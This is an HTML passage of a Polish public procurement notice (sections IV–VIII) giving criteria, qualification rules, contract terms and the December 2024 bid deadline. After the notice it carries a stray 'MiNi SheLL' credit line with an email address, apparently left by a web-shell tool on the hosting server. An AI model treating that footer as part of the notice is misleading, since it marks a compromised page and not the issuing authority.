takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu są opisane w pkt 9 Specyfikacji Warunków Zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp DOTYCZĄCE PRZESŁANEK WYKLUCZENIA Z POSTĘPOWANIA -</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp DOTYCZĄCE PRZESŁANEK WYKLUCZENIA Z POSTĘPOWANIA - ZAŁĄCZNIK NR 3 DO SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o których mowa w pkt 11 ppkt 9 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacje zawarte w Załączniku nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia zgodnie z pkt 13 SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com